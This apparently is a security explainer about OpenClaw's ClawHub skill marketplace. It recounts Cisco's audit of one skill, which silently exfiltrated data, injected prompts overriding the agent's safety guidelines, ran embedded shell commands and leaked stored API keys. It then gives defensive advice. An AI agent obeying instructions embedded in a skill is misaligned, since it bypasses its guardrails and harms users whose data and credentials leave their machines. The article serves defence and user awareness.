OpenClaw Skills: How ClawHub Works, Why Some Skills Are Dangerous, and How to Spot Them

ClawHub is OpenClaw's skill marketplace โ€” and it's powerful. But Cisco's security team found 9 vulnerabilities in a single skill, including data exfiltration and command injection. Here's how skills work and how to tell safe ones from dangerous ones.

ยท 6 min read

OpenClaw Skills: How ClawHub Works, Why Some Skills Are Dangerous, and How to Spot Them

One of OpenClaw's most powerful features is also one of its riskiest: skills.

Skills are small extensions that give OpenClaw new abilities. Want it to control Spotify? There's a skill. Want it to interact with GitHub? Skill. Want it to manage Obsidian notes? Skill. The marketplace where you find them is called ClawHub, and it has 50+ pre-built integrations.

OpenClaw can even search ClawHub and install new skills on its own โ€” no manual step required. That's incredibly convenient. It's also how malicious code gets onto your machine without you noticing. For more, see live example of malicious ClawHub skills in the wild.

Cisco's AI Threat Research team tested this exact scenario. They found 9 security issues in a single skill. Here's what's going on, how the attacks work, and what you can actually do about it.


How Skills Work (The Basics)

A skill is a package โ€” code + metadata โ€” that extends what OpenClaw can do. When you install one, it gets access to OpenClaw's local gateway, which means it can:

  • Execute commands on your machine
  • Read and write files
  • Make network requests
  • Interact with other services and APIs

That's the same level of access OpenClaw itself has. A skill doesn't run in a sandbox. It runs with the same permissions as the agent.

This is why skills are powerful: they can do real things. And it's why a bad skill is genuinely dangerous.


What Cisco Found

Cisco's AI Threat Research team picked a skill called "What Would Elon Do?" โ€” a real skill from the ClawHub ecosystem โ€” and tested it for security issues. They found nine.

Here's what the attack surface looked like:

Silent Data Exfiltration

The skill was sending information to an external server without any indication to the user. No log. No notification. Just quietly uploading data in the background while appearing to do something else entirely.

Direct Prompt Injection

The skill contained instructions that bypassed OpenClaw's own safety guidelines. It didn't need to trick the AI โ€” it directly told it to do things the agent's normal guardrails would have blocked.

Bash Command Injection

The skill could execute arbitrary shell commands on the user's machine. Not commands the user asked for โ€” commands embedded in the skill itself.

Leaked API Keys and Credentials

Through a combination of prompt injection and unsecured endpoints, the skill was able to extract and expose plaintext API keys that the user had stored locally.

Messaging Platform Exploitation

Because OpenClaw connects to WhatsApp, iMessage, and other chat apps, threat actors can craft malicious prompts through those platforms to trigger unintended behavior in skills.


Why This Is Harder to Catch Than It Sounds

On a normal app store, a human reviews each submission. On ClawHub, the ecosystem is moving too fast for that kind of manual review at scale. Skills get added, updated, and installed โ€” sometimes automatically by OpenClaw itself.

Cisco identified four specific enterprise risks:

  1. AI agents bypass traditional data loss prevention (DLP) tools. DLP monitors network traffic and file access. An AI agent with skill-level access doesn't trigger the same alerts.
  2. The model becomes an execution orchestrator. It's not just processing text โ€” it's running code, executing commands, making API calls. Traditional security tools aren't built to monitor that.
  3. Popularity can be artificially inflated. Bad actors can game skill rankings to make malicious skills look trustworthy and widely used.
  4. Employees install these tools without IT knowing. OpenClaw is easy to set up. Someone on your team might have it running on their laptop with skills installed that your security team has never seen.

How to Tell a Safe Skill From a Dangerous One

You can't just trust the skill count or the rating. Here's what to actually look for:

Check the Source

Where did the skill come from? A known developer? An organization with a track record? Or an anonymous account with one skill and no history? Treat unknown sources the way you'd treat an unknown email attachment.

Read the Code

Skills are code. You can read them. Before installing anything, look at what it actually does. If it's making network requests to external servers you don't recognize, that's a red flag. If it's running shell commands that aren't related to its stated purpose, walk away.

Look for Unnecessary Permissions

A skill that helps you manage Spotify shouldn't need access to your file system or shell. If a skill is requesting permissions it doesn't need for its stated function, that's suspicious.

Check for Known Issues

Search for the skill name + "security" or "vulnerability." If Cisco or another security team has flagged it, you'll find it quickly.

Use Cisco's Skill Scanner

Cisco released an open-source tool called Skill Scanner specifically for this problem. It combines three types of analysis:

  • Static analysis โ€” reads the skill's code before it runs
  • Behavioral inspection โ€” watches what the skill does when it executes
  • Semantic analysis โ€” evaluates whether the skill's actions match its stated purpose

If you're running OpenClaw and installing skills from ClawHub, Skill Scanner is worth adding to your workflow. It's the closest thing to an independent security check that exists right now.


The Bigger Picture: Supply Chain Risk for AI Agents

The ClawHub situation is a preview of a problem that's going to get bigger. As AI agents become more capable and more widespread, the "skills" or "tools" or "plugins" they use become a major attack surface โ€” the same way app stores and npm packages are attack surfaces today.

The Moltbot rename incident is an earlier example of the same pattern: when OpenClaw was briefly called Moltbot, bad actors created fake "Moltbot" downloads designed to look like the real thing. People installed them. That's a supply chain attack โ€” and skills are an even more direct version of the same vector, because they run inside the agent with full permissions.

The tools to defend against this are still early. Cisco's Skill Scanner is a good start. But the problem โ€” trusting code that runs with elevated permissions on your machine โ€” is a fundamentally old problem with a new shape.


What to Do Right Now

  1. Don't let OpenClaw auto-install skills without reviewing them first. You can configure this in the agent settings.
  2. Audit what's already installed. If you've been using OpenClaw for a while, check what skills are running. Read their code if you can.
  3. Use Skill Scanner before installing anything new from ClawHub.
  4. Set network monitoring on your machine. If a skill is silently exfiltrating data, network-level monitoring will catch it even if the skill itself doesn't log anything.
  5. Keep OpenClaw updated. Security patches for the agent itself matter โ€” but so do updates to the skills you're running.

Want the full picture on OpenClaw before diving into skills? Start with What Is OpenClaw? The Open-Source AI Agent Everyone Is Talking About. For the broader security landscape, read OpenClaw Security: What You Actually Need to Know.

You May Also Like

More in AI Tools โ†’